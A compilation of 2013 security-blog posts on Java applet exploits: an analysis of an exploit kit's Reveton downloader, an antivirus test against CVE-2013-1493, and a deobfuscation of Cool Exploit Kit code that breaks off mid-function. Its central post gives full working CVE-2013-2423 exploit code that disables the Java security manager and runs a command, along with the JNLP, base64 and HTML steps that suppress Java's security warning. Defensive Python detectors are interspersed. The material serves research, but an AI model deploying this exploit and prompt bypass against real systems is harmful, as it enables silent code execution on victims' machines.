<b><span style="font-size: large;">Missing Reveton</span></b></div>
<div style="text-align: center;">
<b><br /></b></div>
The other interesting thing is the disappearance of Reveton from Fiddler. Below is part of the image from the ninth of July posted at the beginning.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-VYZF1_KZaf4/Ue6-iRIn-PI/AAAAAAAAAsM/AuasfoJvyp8/s1600/missing_reveton.jpg" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-VYZF1_KZaf4/Ue6-iRIn-PI/AAAAAAAAAsM/AuasfoJvyp8/s1600/missing_reveton.jpg" /></a></div>
<br />
<br style="clear: both;" /></div><div>As you can see, Reveton is never downloaded, but you still get infected.</div><div><br /></div><div>So how is the payload downloaded?<br />
<br />
My first thought was that it was embedded in the jar, but after a thorough search I found no trace of it. Looking more closely after the infection, I noticed an uncommon <b>V.class</b> file inside the Temp folder.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-NdmnvBxC9rM/Ue1q8vyszrI/AAAAAAAAApo/i9-oQpwGyEI/s1600/v_class.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-NdmnvBxC9rM/Ue1q8vyszrI/AAAAAAAAApo/i9-oQpwGyEI/s1600/v_class.jpg" /></a></div>
<br />
Part of the disassembled V class.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-1S855n-4i8c/Ue2jGsQaZiI/AAAAAAAAArs/mBk-XK7si_8/s1600/snip_v_class.JPG" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-1S855n-4i8c/Ue2jGsQaZiI/AAAAAAAAArs/mBk-XK7si_8/s1600/snip_v_class.JPG" /></a></div>
<br />
Mystery solved: this compiled Java class is responsible for downloading and executing Reveton.<br />
<br />
How is this class executed?<br />
<br />
At the beginning of the init function the <b>useInner</b> variable takes the value of the <b>usein</b> applet parameter, but since there isn't any parameter called <b>usein</b>, its value will be null.<br />
<br />
The following line calls <b>dgsdgDG</b> from MainAdd2.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-KT5QSFDmY-E/Ue97eJsczVI/AAAAAAAAAtE/LUhCYr9AiUk/s1600/init_start.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-KT5QSFDmY-E/Ue97eJsczVI/AAAAAAAAAtE/LUhCYr9AiUk/s1600/init_start.jpg" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-0jqYUO9UVJw/Ue7vwVsifzI/AAAAAAAAAss/7TwIhiUE7LM/s1600/parameter_val_not_found.JPG" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-0jqYUO9UVJw/Ue7vwVsifzI/AAAAAAAAAss/7TwIhiUE7LM/s1600/parameter_val_not_found.JPG" /></a></div>
<br />
Once again there isn't any parameter called <b>val</b>, so <b>getUrls</b> is executed.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-mpMQIH0-c-0/Ue-KEYzZ45I/AAAAAAAAAtk/P5gSE_2CuJk/s1600/geturls.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-mpMQIH0-c-0/Ue-KEYzZ45I/AAAAAAAAAtk/P5gSE_2CuJk/s1600/geturls.jpg" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-E7zDbytpbVE/Ue7vz1fjy6I/AAAAAAAAAs0/uhyCc4-V27Y/s1600/get_resource.JPG" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-E7zDbytpbVE/Ue7vz1fjy6I/AAAAAAAAAs0/uhyCc4-V27Y/s1600/get_resource.JPG" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
After obtaining the URL of the applet and replacing the jar extension with <b>exe?e=15</b>, a last function called run is executed. Its purpose is to write V.class into the Temp folder and invoke it with the command "<b>javaw -cp <path_tmp_folder> V <reveton_url></b>".</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-w3Jh5oLzRhk/Ue9_SGBgjJI/AAAAAAAAAtU/PtxaPvFana8/s1600/run.jpg" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-w3Jh5oLzRhk/Ue9_SGBgjJI/AAAAAAAAAtU/PtxaPvFana8/s1600/run.jpg" /></a></div>
<br style="clear: both;" /></div><div>There isn't a lot of code to deobfuscate, but you can find the whole V.class <a href="http://pastebin.com/1Ygf0iiS">here</a>. The jar file is available on Kernelmode after registration: <a href="http://www.kernelmode.info/forum/viewtopic.php?f=16&t=1819&start=60#p20209">http://www.kernelmode.info/forum/viewtopic.php?f=16&t=1819&start=60#p20209</a></div><div>
<br />
Maybe a better title for this post is: One exploit to rule them all, one exploit to exploit them, one exploit to infect them all and in a botnet bind them.<br />
<br />
# Edit 1<br />
Black Dragon and Blackhole 2.1 have the same behaviour.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-aalFXtId8As/Uff_IJ3FWgI/AAAAAAAAAtw/7MDxGSqDZpM/s1600/kafeine_tweet.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-aalFXtId8As/Uff_IJ3FWgI/AAAAAAAAAtw/7MDxGSqDZpM/s1600/kafeine_tweet.jpg" /></a></div>
<br />
Related post:<br />
<ul>
<li><a href="http://security-obscurity.blogspot.com/2013/04/the-latest-java-exploit-with-security.html">The Latest Java Exploit with Security Prompt/Warning Bypass (CVE-2013-2423)</a></li>
<li><a href="http://malwageddon.blogspot.com/2013/07/black-dragon-and-all-will-burn-beneath.html">Black Dragon: "... and all will burn beneath the shadow of my wings"</a></li>
<li><a href="http://malware.dontneedcoffee.com/2013/07/a-styxy-cool-ek.html">A "Styxy" Cool EK !</a></li>
</ul>
</div>
<h3>The Latest Java Exploit with Security Prompt/Warning Bypass (CVE-2013-2423)</h3>
<p>Published 2013-04-26, updated 2013-04-27.</p>
Starting with Java SE 7 update 11, Oracle introduced a new security feature called the security warning, which prompts a window every time an applet requests execution.<br />
<br />
For example, if we want to execute the latest Java SE 7 update 17 exploit we get this warning.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-dGzGcf7XW7k/UXk7Q4RYOHI/AAAAAAAAAoQ/57tKgysTFkE/s1600/1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-dGzGcf7XW7k/UXk7Q4RYOHI/AAAAAAAAAoQ/57tKgysTFkE/s1600/1.jpg" /></a></div>
<br />
Yesterday Immunity published a blog post explaining a new vulnerability they found in the Java validation mechanism, which allows an untrusted applet to execute without showing the warning.<br />
<br />
For in-depth details read their blog post <a href="http://immunityproducts.blogspot.com/2013/04/yet-another-java-security-warning-bypass.html">here</a>.<br />
<br />
Briefly, to bypass the above prompt you must call the applet with the parameter <i>__applet_ssv_validated</i> set to true. The only way to manipulate this parameter is to use a Java Network Launch Protocol (JNLP) file.<br />
<br />
According to Oracle, there are two ways to use JNLP in a page:<br />
<ol>
<li>With the applet tag </li>
<li>With javascript only</li>
</ol>
<div>
Let's try the applet tag first. The code we're going to run is the latest publicly available Java exploit, <a href="http://weblog.ikvm.net/CommentView.aspx?guid=acd2dd6d-1028-4996-95df-efa42ac237f0">CVE-2013-2423</a>. </div>
<br />
<pre class="brush: java">import java.applet.Applet;
import java.lang.invoke.MethodHandle;
import java.lang.reflect.Field;
import static java.lang.invoke.MethodHandles.lookup;

public class Code extends Applet
{
    public void init()
    {
        try
        {
            disableSecurityManager();
            Runtime.getRuntime().exec("calc.exe");
        } catch( Throwable e ){}
    }

    // Two classes with the same layout: an int followed by a reference field.
    class Union1 {
        int field1;
        Object field2;
    }
    class Union2 {
        int field1;
        SystemClass field2;
    }

    // Stand-in for java.lang.System: once the Class object for System is stored in a
    // SystemClass-typed field, its static fields can be read and written as f1..f30.
    class SystemClass {
        Object f1,f2,f3,f4,f5,f6,f7,f8,f9,f10,f11,f12,
        f13,f14,f15,f16,f17,f18,f19,f20,f21,f22,f23,
        f24,f25,f26,f27,f28,f29,f30;
    }

    private void disableSecurityManager() throws Throwable
    {
        MethodHandle mh1, mh2;
        // CVE-2013-2423: findStaticSetter() hands out setters for static final fields,
        // so the Double.TYPE and Integer.TYPE constants can be overwritten.
        mh1 = lookup().findStaticSetter(Double.class, "TYPE", Class.class);
        mh2 = lookup().findStaticSetter(Integer.class, "TYPE", Class.class);
        Field fld1 = Union1.class.getDeclaredField("field1");
        Field fld2 = Union2.class.getDeclaredField("field1");
        Class classInt = int.class;
        Class classDouble = double.class;
        // With Double.TYPE == int.class, reflection treats the int fields as doubles and
        // Field.get/set move 8 bytes: field1 together with the adjacent reference field2.
        mh1.invokeExact(int.class);
        mh2.invokeExact((Class)null);
        Union1 u1 = new Union1();
        u1.field2 = System.class;
        Union2 u2 = new Union2();
        // Type confusion: the System.class reference lands in u2.field2 (typed SystemClass).
        fld2.set(u2, fld1.get(u1));
        // Restore the TYPE constants so the rest of the JVM keeps working.
        mh1.invokeExact(classDouble);
        mh2.invokeExact(classInt);
        // One of the overlaid fields is System.security: clear it.
        if (u2.field2.f29 == System.getSecurityManager()) {
            u2.field2.f29 = null;
        } else if (u2.field2.f30 == System.getSecurityManager())
        {
            u2.field2.f30 = null;
        }
    }
}
</pre>
<div>
After building the jar, to deploy the applet we have to create the JNLP file and save it as applet.jnlp.</div>
<div>
<pre class="brush: xml"><?xml version="1.0" encoding="utf-8"?>
<jnlp href="applet.jnlp" spec="1.0" xmlns:jfx="http://javafx.com">
<information>
<title>Applet Test JNLP</title>
<vendor>test</vendor>
</information>
<resources>
<j2se href="http://java.sun.com/products/autodl/j2se" version="1.7+" />
<jar href="cve-2013-2423.jar" main="true" />
</resources>
<applet-desc height="1" main-class="Code" name="Applet Security Bypass" width="1">
<param name="__applet_ssv_validated" value="true" />
</applet-desc>
</jnlp>
</pre>
</div>
<div>
Now we have to encode the content of <i>applet.jnlp</i> as a base64 string. To do this you could use an online tool like <a href="http://base64encode.org/">base64encode.org</a> or the Unix base64 command (with GNU coreutils, -w0 keeps the output on a single line so it can be pasted as an attribute value): <br />
<br />
<pre class="brush: text">base64 -w0 applet.jnlp
</pre>
<br />
Finally, create the page where the applet tag resides. The value of the <i>jnlp_embedded</i> parameter is the base64 string of <i>applet.jnlp</i>. <br />
<pre class="brush: html"><html>
<body>
<h3>Java SE 7 u17 Exploit with Applet Prompt/Warning Bypass</h3>
<applet>
<param name="jnlp_href" value="applet.jnlp" />
<param name="jnlp_embedded" value="PD94bZX ... zYz4KPPg==" />
</applet>
</body>
</html>
</pre>
</div>
After saving all these files in the same directory, we load the page in Firefox to check whether it works. It works perfectly: no security warning is prompted. But if you open the page in Chrome, the applet will not be loaded.<br />
<br />
I think this is because Chrome doesn't like JNLP files.<br />
<br />
The second option is to use JavaScript instead of the applet tag. The first step is to create the JNLP file as before, then encode it to base64. What differs from the previous method is the last step, which looks like this: <br />
<pre class="brush: html"><html>
<head>
<title>CVE-2013-2423 Bypass Prompt</title>
</head>
<body>
<h3>Java SE 7 u17 Exploit with Applet Prompt/Warning Bypass</h3>
<script src="http://www.java.com/js/deployJava.js" ></script>
<script>
var attributes = { height: 1, width: 1};
var parameters = { jnlp_href: 'applet.jnlp',
jnlp_embedded: 'PD94 ... Pg=='
};
deployJava.runApplet(attributes, parameters, '1.7');
</script>
</body>
</html>
</pre>
Loading the page with Chrome, Firefox, IE and Opera shows that it works.<br />
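As an added example, not part of the original post, here is a small Python checker for the defensive side of this: it pulls every jnlp_embedded value out of a page, in both the applet-tag and the deployJava.js form shown above, base64-decodes it, and flags any applet-desc that sets __applet_ssv_validated to true. The sample pages are built inline from the post's own JNLP (with and without the bypass parameter); the function names are mine.<br />

```python
import base64
import binascii
import re
import xml.etree.ElementTree as ET

SSV_PARAM = "__applet_ssv_validated"

# The two embedding styles from the post: <param name="jnlp_embedded" value="..."/>
# and the deployJava.js parameters object { jnlp_embedded: '...' }.
EMBEDDED_PATTERNS = [
    re.compile(r'name\s*=\s*["\']jnlp_embedded["\']\s+value\s*=\s*["\']([^"\']+)["\']', re.I),
    re.compile(r'jnlp_embedded\s*:\s*["\']([^"\']+)["\']', re.I),
]


def extract_embedded_jnlp(html):
    """Return the decoded JNLP documents (bytes) embedded in a page.

    validate=True makes placeholder values such as the 'PD94 ... Pg==' in the post
    fail decoding instead of producing garbage; those values are skipped."""
    docs = []
    for pattern in EMBEDDED_PATTERNS:
        for value in pattern.findall(html):
            try:
                docs.append(base64.b64decode("".join(value.split()), validate=True))
            except (binascii.Error, ValueError):
                continue
    return docs


def ssv_bypass(jnlp_bytes):
    """Details of the applet if the JNLP sets __applet_ssv_validated=true, else None."""
    try:
        root = ET.fromstring(jnlp_bytes)
    except ET.ParseError:
        return None
    for desc in root.iter("applet-desc"):
        for param in desc.iter("param"):
            if param.get("name") == SSV_PARAM and (param.get("value") or "").strip().lower() == "true":
                return {
                    "main_class": desc.get("main-class"),
                    "jars": [jar.get("href") for jar in root.iter("jar")],
                }
    return None


def find_ssv_bypass(html):
    """Every embedded JNLP in the page that carries the prompt-bypass parameter."""
    return [hit for hit in map(ssv_bypass, extract_embedded_jnlp(html)) if hit]


# Constructed sample: the post's applet.jnlp, optionally with the bypass parameter.
def _jnlp(with_bypass):
    lines = [
        '<?xml version="1.0" encoding="utf-8"?>',
        '<jnlp href="applet.jnlp" spec="1.0" xmlns:jfx="http://javafx.com">',
        ' <information><title>Applet Test JNLP</title><vendor>test</vendor></information>',
        ' <resources>',
        '  <j2se href="http://java.sun.com/products/autodl/j2se" version="1.7+" />',
        '  <jar href="cve-2013-2423.jar" main="true" />',
        ' </resources>',
        ' <applet-desc height="1" main-class="Code" name="Applet Security Bypass" width="1">',
    ]
    if with_bypass:
        lines.append('  <param name="__applet_ssv_validated" value="true" />')
    lines += [' </applet-desc>', '</jnlp>']
    return "\n".join(lines)


def build_sample_pages():
    """Constructed pages: the JNLP embedded via <param>, via deployJava.js, and a benign one."""
    bypass_b64 = base64.b64encode(_jnlp(True).encode()).decode()
    benign_b64 = base64.b64encode(_jnlp(False).encode()).decode()
    return {
        "applet_tag": '<applet><param name="jnlp_href" value="applet.jnlp" />'
                      '<param name="jnlp_embedded" value="%s" /></applet>' % bypass_b64,
        "deploy_java": "var parameters = { jnlp_href: 'applet.jnlp', jnlp_embedded: '%s' };\n"
                       "deployJava.runApplet(attributes, parameters, '1.7');" % bypass_b64,
        "benign": '<applet><param name="jnlp_embedded" value="%s" /></applet>' % benign_b64,
    }


if __name__ == "__main__":
    for name, page in build_sample_pages().items():
        print(name, find_ssv_bypass(page))
```

Both embedding styles produce the same finding, and the benign JNLP produces none; a jnlp_href pointing at an external .jnlp file is not fetched here, so a page that only references the file by URL still needs the file itself checked.<br />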
<br />
As usual, here is the video. Enjoy.<br />
<br />
<iframe allowfullscreen="" frameborder="0" height="360" src="http://www.youtube.com/embed/LUrGlXdglHM" width="640"></iframe><br />
<br />
Reference: <br />
<ul>
<li><a href="https://www.java.com/en/download/help/appsecuritydialogs.xml">What should I do when I see a security prompt from Java? </a></li>
<li><a href="http://immunityproducts.blogspot.com/2013/04/yet-another-java-security-warning-bypass.html">Yet Another java security warning bypass</a></li>
<li><a href="http://docs.oracle.com/javase/tutorial/deployment/deploymentInDepth/embeddingJNLPFileInWebPage.html">Embedding JNLP File in Applet Tag</a></li>
</ul>
<b>32 AntiVirus versus the latest Java Exploit (CVE-2013-1493)</b> (2013-03-19)<br />
<br />
Imagine a scenario where someone wants to <b>target</b> your computer to get access to your files. This can be accomplished in several ways, and one of them is using a Java exploit on a crafted or compromised website.<br />
<br />
What I want to test is how antivirus products manage "unknown" threats or forbidden behavior (an unsigned applet shouldn't be allowed to download files to your local disk).<br />
<br />
This test is based on basic/home/free products like Symantec AntiVirus, not Symantec Internet Security, which has more features. Some companies provide only Internet Security suites, so this <b>cannot</b> be a full comparison between these products.<br />
<br />
I tried to test all the antivirus products in <a href="https://www.virustotal.com/en/about/credits/">this</a> list but ended up with only 32, because some of them don't provide a free trial and the others I was unable to find or install. The important thing is that I covered all the major/popular antivirus products.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-Ax2r90NNt9o/UUQzzlIERhI/AAAAAAAAAnU/iF1MGdnEREo/s1600/opswat.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="296" src="http://4.bp.blogspot.com/-Ax2r90NNt9o/UUQzzlIERhI/AAAAAAAAAnU/iF1MGdnEREo/s640/opswat.jpg" width="640" /></a></div>
<br />
<br />
The testing machine is a fully patched Windows 7 SP1 32-bit on VirtualBox with Java SE 7 update 15 and Firefox as the browser.<br />
<br />
The exploit is <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1493">CVE-2013-1493</a>, not obfuscated, which after successful exploitation downloads hello.jpg from a remote host into the temp directory; the file is then renamed to hello.exe and executed with "cmd /C 'temp_path\hello.exe'".<br />
<br />
The executable just displays "Hello Malware".<br />
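The behaviour this test exercises, a Java process dropping an executable into the temp directory and launching it through cmd, is also easy to spot in process-creation telemetry, which is where you look when the antivirus stays silent. The following Python is an added example, not from the post: it classifies process-creation records (the pipe-separated key=value format, the user name, timestamps and paths are all constructed for the demo) and flags a Java parent that runs an executable from a Temp directory, with a lower-severity hit for a Java parent that merely spawns a shell.<br />

```python
import re

JAVA_PARENTS = {"java.exe", "javaw.exe", "jp2launcher.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe"}
# An .exe sitting under a Temp directory (e.g. ...\AppData\Local\Temp\hello.exe).
TEMP_EXE = re.compile(r'\\Temp\\[^\\"]+\.exe\b', re.I)


def parse_event(line):
    """'key=value|key=value' record -> dict (constructed format for this demo)."""
    return dict(part.split("=", 1) for part in line.strip().split("|"))


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def classify(event):
    """'high' for Java executing a Temp-directory .exe, 'medium' for Java spawning a shell, else None."""
    if basename(event.get("parent", "")) not in JAVA_PARENTS:
        return None
    image = event.get("image", "")
    cmdline = event.get("cmdline", "")
    if TEMP_EXE.search(image) or TEMP_EXE.search(cmdline):
        return "high"
    if basename(image) in SHELLS:
        return "medium"
    return None


def detect(lines):
    """Return (severity, event) for every record that matches, in input order."""
    hits = []
    for line in lines:
        event = parse_event(line)
        severity = classify(event)
        if severity:
            hits.append((severity, event))
    return hits


# Constructed sample records modelled on the post's payload (hello.jpg renamed to hello.exe
# and run via "cmd /C"); the timestamps, user and paths are invented.
SAMPLE_EVENTS = [
    r'ts=2013-03-19T11:00:01|parent=C:\Program Files\Java\jre7\bin\java.exe|image=C:\Windows\System32\cmd.exe|cmdline=cmd /C "C:\Users\test\AppData\Local\Temp\hello.exe"',
    r'ts=2013-03-19T11:00:02|parent=C:\Windows\explorer.exe|image=C:\Windows\System32\cmd.exe|cmdline=cmd /C dir',
    r'ts=2013-03-19T11:00:03|parent=C:\Program Files\Java\jre7\bin\java.exe|image=C:\Users\test\AppData\Local\Temp\hello.exe|cmdline="C:\Users\test\AppData\Local\Temp\hello.exe"',
    r'ts=2013-03-19T11:00:04|parent=C:\Program Files\Java\jre7\bin\java.exe|image=C:\Windows\System32\cmd.exe|cmdline=cmd /C echo hello',
]

if __name__ == "__main__":
    for severity, event in detect(SAMPLE_EVENTS):
        print(severity, event["ts"], event["cmdline"])
```

The rule is deliberately narrow (parent is the JVM, child is a shell or a Temp-path executable), so it does not depend on recognising the dropped file; it would have flagged the run above on every product in the table regardless of their signatures.<br />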
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-YvpdUt0TT3E/UUcaUKDwF3I/AAAAAAAAAn0/C3lcQQkPrhE/s1600/hello.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-YvpdUt0TT3E/UUcaUKDwF3I/AAAAAAAAAn0/C3lcQQkPrhE/s1600/hello.jpg" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
I decided to run this executable instead of the classic calculator because some antivirus products have a cloud-based reputation service, and since this is an unknown file dropped by Java (like malware) they should prompt some warning.<br />
<br />
Maybe some of you will say "this is not malware, of course the AV doesn't block it"; what I want to test here is the software against the Java exploit, not malicious executable detection, which is another story.<br />
<br />
The developers of chk4me claim not to send uploaded files to antivirus companies, so it is the right place to check the exploit before the test.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-IWEHwW5-MS8/UUN14eMG4bI/AAAAAAAAAnE/eYNLerGTIYc/s1600/chk4me.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-IWEHwW5-MS8/UUN14eMG4bI/AAAAAAAAAnE/eYNLerGTIYc/s1600/chk4me.jpg" /></a></div>
<br />
<br />
To be clearer, I made this table reporting the "score" obtained by each antivirus against CVE-2013-1493.<br />
<br />
I used this scale of values:<br />
<ul>
<li>0 = Exploit and "malicious" exe executed successfully</li>
<li>1 = Exploit executed successfully but "malicious" exe not executed or sandboxed</li>
<li>2 = Exploit blocked/not executed</li>
</ul>
<table align="center" border="1"><thead>
<tr><th>AntiVirus Name</th> <th>Score</th></tr>
</thead> <tbody>
<tr><td>Ad-Aware Free Antivirus+</td><td align="center">0</td></tr>
<tr><td>AVG Antivirus Free 2013</td><td align="center">0</td></tr>
<tr><td>Avira Free Antivirus 2013</td><td align="center">0</td></tr>
<tr><td>Bitdefender Antivirus Free Edition</td><td align="center">0</td></tr>
<tr><td>Quick Heal Antivirus Pro 2013</td><td align="center">0</td></tr>
<tr><td>Immunet 3.0</td><td align="center">0</td></tr>
<tr><td>Dr.Web Anti-virus Pro</td><td align="center">0</td></tr>
<tr><td>ESET NOD32 Antivirus 6</td><td align="center">0</td></tr>
<tr><td>FortiClient Endpoint Security Management</td><td align="center">0</td></tr>
<tr><td>F-PROT Antivirus</td><td align="center">0</td></tr>
<tr><td>F-Secure Anti-Virus</td><td align="center">0</td></tr>
<tr><td>G Data AntiVirus 2013</td><td align="center">0</td></tr>
<tr><td>IKARUS anti.virus</td><td align="center">0</td></tr>
<tr><td>Kingsoft Internet Security 9</td><td align="center">0</td></tr>
<tr><td>Malwarebytes Anti-Malware Free</td><td align="center">0</td></tr>
<tr><td>McAfee AntiVirus Plus 2013</td><td align="center">0</td></tr>
<tr><td>Microsoft Security Essentials</td><td align="center">0</td></tr>
<tr><td>NANO Antivirus</td><td align="center">0</td></tr>
<tr><td>Norman Antivirus 10</td><td align="center">0</td></tr>
<tr><td>Outpost Antivirus Pro</td><td align="center">0</td></tr>
<tr><td>Panda Cloud Antivirus</td><td align="center">0</td></tr>
<tr><td>Rising Free Antivirus</td><td align="center">0</td></tr>
<tr><td>VIPRE Antivirus 2013</td><td align="center">0</td></tr>
<tr><td>VirusBuster Personal Antivirus</td><td align="center">0</td></tr>
<tr><td>ArcaVir 2013 Antivirus</td><td align="center">1</td></tr>
<tr><td>Avast! Free Antivirus</td><td align="center">1</td></tr>
<tr><td>Comodo Antivirus Free</td><td align="center">1</td></tr>
<tr><td>Emsisoft Anti-Malware 7.0</td><td align="center">1</td></tr>
<tr><td>Trend Micro Titanium Antivirus Plus</td><td align="center">1</td></tr>
<tr><td>Kaspersky Anti-Virus 2013</td><td align="center">2</td></tr>
<tr><td>Norton AntiVirus</td><td align="center">2</td></tr>
<tr><td>Sophos Anti-Virus</td><td align="center">2</td></tr>
</tbody> </table>
<br />
Summarizing the results:<br />
<ul>
<li>24 (75 %) detect neither the exploit nor the executable </li>
<li>5 (16 %) don't detect the exploit but warn you about the executable</li>
<li>3 (9 %) detect the exploit. </li>
</ul>
Looking only at the exploit, 91 % don't detect it and 9 % are able to block it.<br />
<br />
There were some cases where I was undecided between a score of 1 or 2, like ArcaVir. When an applet tries to contact another domain, ArcaVir prompts you with an alert; however, it's not saying "this is an exploit and I block it" but "hey, this applet is trying to connect to this domain, what do you want to do?". For this reason I opted for a score of 1 instead of 2.<br />
<div>
<br />
Symantec surprised me because a couple of months ago it didn't detect any Java exploit and now it blocks them all; maybe they decided to improve their basic software after the <a href="http://www.nytimes.com/2013/01/31/technology/chinese-hackers-infiltrate-new-york-times-computers.html">Wall Street Journal</a> story.<br />
<br /></div>
Lastly, here is the video; maybe you will find it boring, but you can see how several antivirus products handle a Java exploit.<br />
<br />
<iframe allowfullscreen="" frameborder="0" height="360" src="http://www.youtube.com/embed/STO5LZBbqXU" width="640"></iframe><br />
<br />
<b>Deobfuscating Java 7u11 Exploit from Cool Exploit Kit (CVE-2013-0431)</b> (2013-02-26)<br />
<br />
At the beginning of last week <a href="https://twitter.com/kafeine/status/303551981170089984/">@EKWatcher</a> spotted <a href="http://malware.dontneedcoffee.com/2012/10/newcoolek.html">Cool Exploit Kit</a> using the Java 7 update 11 vulnerability (CVE-2013-0431).<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-hOI4JyvxnmY/USu0YrJtIMI/AAAAAAAAAgg/XwSVZJCZUHo/s1600/1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-hOI4JyvxnmY/USu0YrJtIMI/AAAAAAAAAgg/XwSVZJCZUHo/s1600/1.jpg" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
This vulnerability had already been reported by <a href="http://seclists.org/fulldisclosure/2013/Jan/142">Security Explorations</a> on seclists a few days after Oracle issued update 11.<br />
<br />
I decided to take a look at it. I found a website infected by Cool EK that, after successful exploitation, dropped Reveton into the "<i>C:\Documents and Settings\<username>\Application Data</i>" folder on Windows XP.<br />
<br />
The applet used by Cool EK was named would-blood.jar and, once opened with JD-GUI, this was the result.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-p7gg_GfWZzU/USsq8T_Y9gI/AAAAAAAAAfA/dx7psxiKuhw/s1600/would_blood_applet.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="388" src="http://4.bp.blogspot.com/-p7gg_GfWZzU/USsq8T_Y9gI/AAAAAAAAAfA/dx7psxiKuhw/s640/would_blood_applet.JPG" width="640" /></a></div>
<br />
As you can see it's obfuscated, not heavily, but obfuscated. The first thing to do when you want to start deobfuscating an applet is to find the init() function, which is the "starting point" and cannot be renamed. Remember that for serialized applets the starting point is a function called start() instead of init().<br />
<br />
The init function is inside the <b>hw</b> class.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-tq9UjKYDGP4/USsrP_Ki0KI/AAAAAAAAAfI/rNE7bvkm1TI/s1600/applet_init.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="266" src="http://4.bp.blogspot.com/-tq9UjKYDGP4/USsrP_Ki0KI/AAAAAAAAAfI/rNE7bvkm1TI/s640/applet_init.JPG" width="640" /></a></div>
<br />
It's immediately evident that all strings in init() are reversed; for example, the first one is <i>txetnoC.lanretni.tpircsavaj.allizom.gro.nus</i>, which written backwards becomes <i>sun.org.mozilla.javascript.internal.Context</i>. As expected, the <b>pah</b> function reverses the string.<br />
<br />
The next function called is <b>bug</b>.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-QwvDEVrYScs/USsrhTj2tZI/AAAAAAAAAfQ/8bgcK0Sp8WQ/s1600/bug_function.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="123" src="http://3.bp.blogspot.com/-QwvDEVrYScs/USsrhTj2tZI/AAAAAAAAAfQ/8bgcK0Sp8WQ/s640/bug_function.JPG" width="640" /></a></div>
<br />
The <b>bug</b> function obtains the MBeanInstantiator associated with the MBeanServer and calls <b>rue2</b>.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-2qjdw2EdOg8/USsrqrh1frI/AAAAAAAAAfY/uVble5o_8TM/s1600/rue2_function.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-2qjdw2EdOg8/USsrqrh1frI/AAAAAAAAAfY/uVble5o_8TM/s1600/rue2_function.JPG" /></a></div>
<br />
Now, through reflection, it invokes the findClass method, which finds and returns the specified class (<i>sun.org.mozilla.javascript.internal.Context</i>).<br />
<br />
Considering this, we can remove the <b>pah</b> function and merge <b>bug</b> and <b>rue2</b> into a single new function called <b>gimmeClass</b>.<br />
<pre class="brush: java">// Needs: import java.lang.reflect.Method; import javax.management.ReflectionException;
//        import com.sun.jmx.mbeanserver.JmxMBeanServer; import com.sun.jmx.mbeanserver.MBeanInstantiator;
// CVE-2013-0431: MBeanInstantiator.findClass() is reached through the JMX MBean server and
// loads a restricted class (here sun.org.mozilla.javascript.internal.Context) for the applet.
private Class gimmeClass(String s) throws ReflectionException, ReflectiveOperationException
{
    Object obj = null; // passed as the ClassLoader argument
    JmxMBeanServer jmxmbeanserver = (JmxMBeanServer)JmxMBeanServer.newMBeanServer("", null, null, true);
